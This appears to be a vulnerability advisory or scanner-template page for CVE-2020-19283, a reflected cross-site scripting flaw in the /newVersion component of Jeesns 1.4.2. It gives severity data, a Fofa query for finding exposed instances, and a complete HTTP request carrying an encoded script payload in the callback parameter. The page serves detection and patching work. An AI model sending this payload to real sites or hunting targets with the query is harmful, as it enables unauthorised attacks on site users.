| Title | Jeesns 1.4.2 - Cross-Site Scripting |
|---|---|
| Author | pikpikcu |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.01992 |
| CVE ID | CVE-2020-19283 |
| CWE ID | CWE-79 |
| Fofa Query | title="jeesns" |
| Tags | cve cve2020 jeesns xss vuln |
Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /newVersion component and allows attackers to execute arbitrary web scripts or HTML.
GET /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.14
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-19283.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-19283.pcap
N/AN/A